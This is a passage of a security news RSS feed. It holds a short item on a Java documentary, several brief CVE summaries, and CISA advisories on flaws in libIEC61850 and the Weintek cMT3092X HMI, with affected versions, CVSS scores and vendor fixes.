This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-60157">CVE-2026-60157</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[‘The Java Story’ recounts the rise, fall, and rise again of Java]]></title>
<description><![CDATA[The evolution of Java is the subject of a just-released documentary about the programming language and development platform. “The Java Story: The Official Documentary” tells the story of Java through interviews with the engineers who created it and shepherded it through three decades.



Produced...]]></description>
<link>https://tsecurity.de/de/3690140/ai-nachrichten/the-java-story-recounts-the-rise-fall-and-rise-again-of-java/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690140/ai-nachrichten/the-java-story-recounts-the-rise-fall-and-rise-again-of-java/</guid>
<pubDate>Thu, 23 Jul 2026 22:04:52 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The evolution of <a href="https://www.infoworld.com/article/2335996/9-reasons-java-is-still-great.html" data-type="link" data-id="https://www.infoworld.com/article/2335996/9-reasons-java-is-still-great.html">Java</a> is the subject of a just-released documentary about the programming language and development platform. <a href="https://inside.java/2026/07/18/the-java-documentary/">“The Java Story: The Official Documentary”</a> tells the story of Java through interviews with the engineers who created it and shepherded it through three decades.</p>



<p class="wp-block-paragraph">Produced by <a href="https://www.youtube.com/@cultrepo">CultRepo</a> and sponsored by Oracle, JetBrains, IBM, and Azul, the documentary follows Java from its set-top box and browser-based origins at Sun Microsystems in the 1990s and through its rise to dominate server-side computing in the 2000s, the “dark ages” and resurgence with Java 8 under Oracle in the 2010s, and its continuing modernization and promising role in AI today. “From its humble beginnings as a project code-named ‘Oak’ at Sun Microsystems to becoming a global standard for enterprise software and billions of devices, Java’s journey is one of radical innovation, strategic pivots, and enduring community strength,” said Cult.Repo. </p>



<p class="wp-block-paragraph">The documentary also delves into Sun’s bitter Java licensing dispute with Microsoft, Oracle’s suit of Google over its use of Java APIs Android (Google won), the creation of the <a href="https://www.infoworld.com/article/2164290/a-look-inside-the-java-community-process.html" data-type="link" data-id="https://www.infoworld.com/article/2164290/a-look-inside-the-java-community-process.html">Java Community Process</a>, Sun’s open-sourcing of Java, and Oracle’s switch to the six-month release cycle. Technical enhancements such as lambda expressions in Java 8, virtual threads in Java 21 (<a href="https://www.infoworld.com/article/2334607/project-loom-understand-the-new-java-concurrency-model.html" data-type="link" data-id="https://www.infoworld.com/article/2334607/project-loom-understand-the-new-java-concurrency-model.html">Project Loom</a>), and the ongoing refactor to bring value objects to the Java object model (<a href="https://www.infoworld.com/article/2337986/project-valhalla-a-look-inside-javas-epic-refactor.html" data-type="link" data-id="https://www.infoworld.com/article/2337986/project-valhalla-a-look-inside-javas-epic-refactor.html">Project Valhalla</a>) also get attention. </p>



<p class="wp-block-paragraph">Technical experts and other Java figures interviewed in the documentary include James Gosling, creator of Java; Kim Polese, Java’s first product manager; Carla Schroer, director of Java compatibility at Sun Microsystems; James Duncan Davidson, creator of Apache Tomcat; Mark Reinhold, chief architect of the Java Platform Group at Oracle; Brian Goetz, Java language architect in the Java Platform Group at Oracle; Rod Johnson, creator of Spring; and Gavin King, creator of Hibernate. </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-60205 | Oracle WebLogic Server 12.2.1.4.0/14.1.2.0.0 Core privileges management (Nessus ID 329169)]]></title>
<description><![CDATA[A vulnerability was found in Oracle WebLogic Server 12.2.1.4.0/14.1.2.0.0. It has been rated as very critical. This affects an unknown function of the component Core. Performing a manipulation results in improper privilege management.

This vulnerability was named CVE-2026-60205. The attack may b...]]></description>
<link>https://tsecurity.de/de/3690129/sicherheitsluecken/cve-2026-60205-oracle-weblogic-server-122140141200-core-privileges-management-nessus-id-329169/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690129/sicherheitsluecken/cve-2026-60205-oracle-weblogic-server-122140141200-core-privileges-management-nessus-id-329169/</guid>
<pubDate>Thu, 23 Jul 2026 22:01:47 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/oracle:weblogic_server">Oracle WebLogic Server 12.2.1.4.0/14.1.2.0.0</a>. It has been rated as <a href="https://vuldb.com/kb/risk">very critical</a>. This affects an unknown function of the component <em>Core</em>. Performing a manipulation results in improper privilege management.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-60205">CVE-2026-60205</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-14291 | Security Ninja Premium Plugin up to 5.289 on WordPress improper authentication (CNNVD-2026-50109918)]]></title>
<description><![CDATA[A vulnerability was found in Security Ninja Premium Plugin up to 5.289 on WordPress. It has been rated as critical. This vulnerability affects unknown code. Performing a manipulation results in improper authentication.

This vulnerability was named CVE-2026-14291. The attack may be initiated remo...]]></description>
<link>https://tsecurity.de/de/3690098/sicherheitsluecken/cve-2026-14291-security-ninja-premium-plugin-up-to-5289-on-wordpress-improper-authentication-cnnvd-2026-50109918/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690098/sicherheitsluecken/cve-2026-14291-security-ninja-premium-plugin-up-to-5289-on-wordpress-improper-authentication-cnnvd-2026-50109918/</guid>
<pubDate>Thu, 23 Jul 2026 21:37:28 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/security_ninja_premium_plugin">Security Ninja Premium Plugin up to 5.289</a> on WordPress. It has been rated as <a href="https://vuldb.com/kb/risk">critical</a>. This vulnerability affects unknown code. Performing a manipulation results in improper authentication.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-14291">CVE-2026-14291</a>. The attack may be initiated remotely. There is no available exploit.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-50251 | NLnet Labs Unbound up to 1.25.1 Iterator unwanted-reply-threshold infinite loop (WID-SEC-2026-2492)]]></title>
<description><![CDATA[A vulnerability marked as critical has been reported in NLnet Labs Unbound up to 1.25.1. The impacted element is an unknown function of the component Iterator. Performing a manipulation of the argument unwanted-reply-threshold results in infinite loop.

This vulnerability was named CVE-2026-50251...]]></description>
<link>https://tsecurity.de/de/3690097/sicherheitsluecken/cve-2026-50251-nlnet-labs-unbound-up-to-1251-iterator-unwanted-reply-threshold-infinite-loop-wid-sec-2026-2492/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690097/sicherheitsluecken/cve-2026-50251-nlnet-labs-unbound-up-to-1251-iterator-unwanted-reply-threshold-infinite-loop-wid-sec-2026-2492/</guid>
<pubDate>Thu, 23 Jul 2026 21:37:26 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">critical</a> has been reported in <a href="https://vuldb.com/product/nlnet_labs:unbound">NLnet Labs Unbound up to 1.25.1</a>. The impacted element is an unknown function of the component <em>Iterator</em>. Performing a manipulation of the argument <em>unwanted-reply-threshold</em> results in infinite loop.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-50251">CVE-2026-50251</a>. The attack may be initiated remotely. There is no available exploit.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-65696 | sct Overseerr up to 1.35.0 Push Subscription API userId authorization]]></title>
<description><![CDATA[A vulnerability described as critical has been identified in sct Overseerr up to 1.35.0. This affects an unknown part of the component Push Subscription API. The manipulation of the argument userId results in authorization bypass. This vulnerability only affects products that are no longer suppor...]]></description>
<link>https://tsecurity.de/de/3689949/sicherheitsluecken/cve-2026-65696-sct-overseerr-up-to-1350-push-subscription-api-userid-authorization/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689949/sicherheitsluecken/cve-2026-65696-sct-overseerr-up-to-1350-push-subscription-api-userid-authorization/</guid>
<pubDate>Thu, 23 Jul 2026 20:19:01 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">critical</a> has been identified in <a href="https://vuldb.com/product/sct:overseerr">sct Overseerr up to 1.35.0</a>. This affects an unknown part of the component <em>Push Subscription API</em>. The manipulation of the argument <em>userId</em> results in authorization bypass. This vulnerability only affects products that are no longer supported by the maintainer.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-65696">CVE-2026-65696</a>. The attack may be performed from remote. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[MZ Automation libIEC61850]]></title>
<description><![CDATA[View CSAF
Summary
Successful exploitation of these vulnerabilities could allow an unauthenticated network-adjacent attacker to crash critical IEC 61850 services or execute arbitrary code, disrupting or compromising protection, visibility, and control functions.
The following versions of MZ Automa...]]></description>
<link>https://tsecurity.de/de/3689940/it-security-nachrichten/mz-automation-libiec61850/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689940/it-security-nachrichten/mz-automation-libiec61850/</guid>
<pubDate>Thu, 23 Jul 2026 20:16:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-204-06.json"><strong>View CSAF</strong></a></p>
<h2>Summary</h2>
<p><strong>Successful exploitation of these vulnerabilities could allow an unauthenticated network-adjacent attacker to crash critical IEC 61850 services or execute arbitrary code, disrupting or compromising protection, visibility, and control functions.</strong></p>
<p>The following versions of MZ Automation libIEC61850 are affected:</p>
<ul>
<li>libIEC61850 &gt;=v1.0.0|&lt;=v1.6.1 </li>
</ul>
<div class="csaf-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS</th>
<th role="columnheader">Vendor</th>
<th role="columnheader">Equipment</th>
<th role="columnheader">Vulnerabilities</th>
</tr>
</thead>
<tbody>
<tr>
<td>v3 8.1</td>
<td>MZ Automation</td>
<td>MZ Automation libIEC61850</td>
<td>Stack-based Buffer Overflow, Heap-based Buffer Overflow, Improper Handling of Syntactically Invalid Structure, NULL Pointer Dereference</td>
</tr>
</tbody>
</table>
</div>
<h3>Background</h3>
<ul>
<li><strong>Critical Infrastructure Sectors: </strong>Critical Manufacturing, Energy, Transportation Systems</li>
<li><strong>Countries/Areas Deployed: </strong>Worldwide</li>
<li><strong>Company Headquarters Location: </strong>Germany</li>
</ul>
<hr>
<h2>Vulnerabilities</h2>
<div class="csaf-accordion">
<p><a class="csaf-accordion-toggle-all" href="https://www.cisa.gov/#">Expand All +</a></p>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-50039</a></h3>
<div class="csaf-accordion-content">
<p>The affected product is vulnerable to a stack-based buffer overflow, which may allow an attacker to cause a memory corruption via a ReadRequest.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-50039">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>MZ Automation libIEC61850</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>MZ Automation</div>
<div class="ics-version"><strong>Product Version:</strong><br>MZ Automation libIEC61850: &gt;=v1.0.0|&lt;=v1.6.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>MZ Automation recommends updating to the latest build of the libIEC61850 standard. Documentation can be found at https://github.com/mz-automation/libiec61850.<br><a href="https://github.com/mz-automation/libiec61850">https://github.com/mz-automation/libiec61850</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/121.html">CWE-121 Stack-based Buffer Overflow</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
<tr>
<td>4.0</td>
<td>8.7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N">CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-49035</a></h3>
<div class="csaf-accordion-content">
<p>The affected product is vulnerable to a heap-based buffer overflow via a crafted MMS Initiate request. Remote code execution (RCE) has been demonstrated when ASLR is disabled; memory corruption or denial of service may occur in configurations where ASLR is enabled.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-49035">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>MZ Automation libIEC61850</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>MZ Automation</div>
<div class="ics-version"><strong>Product Version:</strong><br>MZ Automation libIEC61850: &gt;=v1.0.0|&lt;=v1.6.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>MZ Automation recommends updating to the latest build of the libIEC61850 standard. Documentation can be found at https://github.com/mz-automation/libiec61850.<br><a href="https://github.com/mz-automation/libiec61850">https://github.com/mz-automation/libiec61850</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/122.html">CWE-122 Heap-based Buffer Overflow</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
<tr>
<td>4.0</td>
<td>9.2</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N">CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-50103</a></h3>
<div class="csaf-accordion-content">
<p>A NULL pointer dereference in the L2 GOOSE and R-GOOSE shared parser, which may allow a network-adjacent attacker to crash a subscribing application by sending a crafted GOOSE frame containing a malformed TLV value.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-50103">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>MZ Automation libIEC61850</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>MZ Automation</div>
<div class="ics-version"><strong>Product Version:</strong><br>MZ Automation libIEC61850: &gt;=v1.0.0|&lt;=v1.6.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>MZ Automation recommends updating to the latest build of the libIEC61850 standard. Documentation can be found at https://github.com/mz-automation/libiec61850.<br><a href="https://github.com/mz-automation/libiec61850">https://github.com/mz-automation/libiec61850</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/228.html">CWE-228 Improper Handling of Syntactically Invalid Structure</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
<tr>
<td>4.0</td>
<td>7.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N">CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-50032</a></h3>
<div class="csaf-accordion-content">
<p>A NULL pointer dereference in the MMS Write Named Variable List handler, which may allow a network adjacent attacker to crash the server by sending a WriteRequest with an empty listOfData field.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-50032">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>MZ Automation libIEC61850</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>MZ Automation</div>
<div class="ics-version"><strong>Product Version:</strong><br>MZ Automation libIEC61850: &gt;=v1.0.0|&lt;=v1.6.1</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>MZ Automation recommends updating to the latest build of the libIEC61850 standard. Documentation can be found at https://github.com/mz-automation/libiec61850.<br><a href="https://github.com/mz-automation/libiec61850">https://github.com/mz-automation/libiec61850</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
<tr>
<td>4.0</td>
<td>8.7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N">CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<hr>
<h2>Acknowledgments</h2>
<ul>
<li>Abhinav Agarwal reported these vulnerabilities to CISA</li>
</ul>
<hr>
<h2>Legal Notice and Terms of Use</h2>
<p>This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy &amp; Use policy (https://www.cisa.gov/privacy-policy).</p>
<hr>
<h2>Recommended Practices</h2>
<p>CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities.</p>
<p>Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.</p>
<p>Locate control system networks and remote devices behind firewalls and isolating them from business networks.</p>
<p>When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.</p>
<p>CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.</p>
<p>CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.</p>
<p>CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.</p>
<p>Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.</p>
<p>Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.</p>
<p>CISA also recommends users take the following measures to protect themselves from social engineering attacks:</p>
<p>Do not click web links or open attachments in unsolicited email messages.</p>
<p>Refer to Recognizing and Avoiding Email Scams for more information on avoiding email scams.</p>
<p>Refer to Avoiding Social Engineering and Phishing Attacks for more information on social engineering attacks.</p>
<p>No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.</p>
<hr>
<h2>Revision History</h2>
<ul>
<li><strong>Initial Release Date: </strong>2026-07-23</li>
</ul>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date</th>
<th role="columnheader">Revision</th>
<th role="columnheader">Summary</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-07-23</td>
<td>1</td>
<td>Initial Publication</td>
</tr>
</tbody>
</table>
<hr>
<h2>Legal Notice and Terms of Use</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[Weintek cMT3092X]]></title>
<description><![CDATA[View CSAF
Summary
Successful exploitation of these vulnerabilities could allow a non-privileged user to escalate privileges or view the credentials of other users.
The following versions of Weintek cMT3092X are affected:

cMT3092X firmware]]></description>
<link>https://tsecurity.de/de/3689937/it-security-nachrichten/weintek-cmt3092x/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689937/it-security-nachrichten/weintek-cmt3092x/</guid>
<pubDate>Thu, 23 Jul 2026 20:16:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-204-03.json"><strong>View CSAF</strong></a></p>
<h2>Summary</h2>
<p><strong>Successful exploitation of these vulnerabilities could allow a non-privileged user to escalate privileges or view the credentials of other users.</strong></p>
<p>The following versions of Weintek cMT3092X are affected:</p>
<ul>
<li>cMT3092X firmware &lt;20210218 </li>
<li>EasyWeb &lt;v2.1.20</li>
</ul>
<div class="csaf-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS</th>
<th role="columnheader">Vendor</th>
<th role="columnheader">Equipment</th>
<th role="columnheader">Vulnerabilities</th>
</tr>
</thead>
<tbody>
<tr>
<td>v3 8.8</td>
<td>Weintek</td>
<td>Weintek cMT3092X</td>
<td>Reliance on Cookies without Validation and Integrity Checking in a Security Decision, Incorrect Permission Assignment for Critical Resource, Plaintext Storage of a Password, Incorrect User Management</td>
</tr>
</tbody>
</table>
</div>
<h3>Background</h3>
<ul>
<li><strong>Critical Infrastructure Sectors: </strong>Critical Manufacturing</li>
<li><strong>Countries/Areas Deployed: </strong>Worldwide</li>
<li><strong>Company Headquarters Location: </strong>Taiwan</li>
</ul>
<hr>
<h2>Vulnerabilities</h2>
<div class="csaf-accordion">
<p><a class="csaf-accordion-toggle-all" href="https://www.cisa.gov/#">Expand All +</a></p>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-60134</a></h3>
<div class="csaf-accordion-content">
<p>Weintek cMT3092X HMI allows a non-privileged user to modify cookies to gain elevated privileges.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-60134">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Weintek cMT3092X</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Weintek</div>
<div class="ics-version"><strong>Product Version:</strong><br>Weintek cMT3092X firmware: &lt;20210218, Weintek EasyWeb: &lt;v2.1.20</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Weintek recommends users apply the patch package named cmt_typeB_20260316_007.patch, which contains a newer EasyWeb 2.3.17-typeb. This fix will be delivered as a patch-only update; no separate standard firmware release is planned. Users may request the patch directly from Weintek support (https://www.weintek.com/globalw/Support/Knowledge.aspx) or from distributors.<br><a href="https://www.weintek.com/globalw/Support/Knowledge.aspx">https://www.weintek.com/globalw/Support/Knowledge.aspx</a></p>
<p><strong>Mitigation</strong><br>Weintek has published a document with more details about this issue at https://dl.weintek.com/public/Document/TEC/TEC25003E_cMT_EasyWeb_V2_Security_Issues.pdf.<br><a href="https://dl.weintek.com/public/Document/TEC/TEC25003E_cMT_EasyWeb_V2_Security_Issues.pdf">https://dl.weintek.com/public/Document/TEC/TEC25003E_cMT_EasyWeb_V2_Security_Issues.pdf</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/784.html">CWE-784 Reliance on Cookies without Validation and Integrity Checking in a Security Decision</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
<tr>
<td>4.0</td>
<td>8.7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N">CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-61892</a></h3>
<div class="csaf-accordion-content">
<p>Weintek cMT3092X HMI allows a non-privileged user to modify tokens to escalate privileges.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-61892">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Weintek cMT3092X</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Weintek</div>
<div class="ics-version"><strong>Product Version:</strong><br>Weintek cMT3092X firmware: &lt;20210218, Weintek EasyWeb: &lt;v2.1.20</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Weintek recommends users apply the patch package named cmt_typeB_20260316_007.patch, which contains a newer EasyWeb 2.3.17-typeb. This fix will be delivered as a patch-only update; no separate standard firmware release is planned. Users may request the patch directly from Weintek support (https://www.weintek.com/globalw/Support/Knowledge.aspx) or from distributors.<br><a href="https://www.weintek.com/globalw/Support/Knowledge.aspx">https://www.weintek.com/globalw/Support/Knowledge.aspx</a></p>
<p><strong>Mitigation</strong><br>Weintek has published a document with more details about this issue at https://dl.weintek.com/public/Document/TEC/TEC25003E_cMT_EasyWeb_V2_Security_Issues.pdf.<br><a href="https://dl.weintek.com/public/Document/TEC/TEC25003E_cMT_EasyWeb_V2_Security_Issues.pdf">https://dl.weintek.com/public/Document/TEC/TEC25003E_cMT_EasyWeb_V2_Security_Issues.pdf</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/732.html">CWE-732 Incorrect Permission Assignment for Critical Resource</a></p>
<hr>
<h4>Metrics</h4>
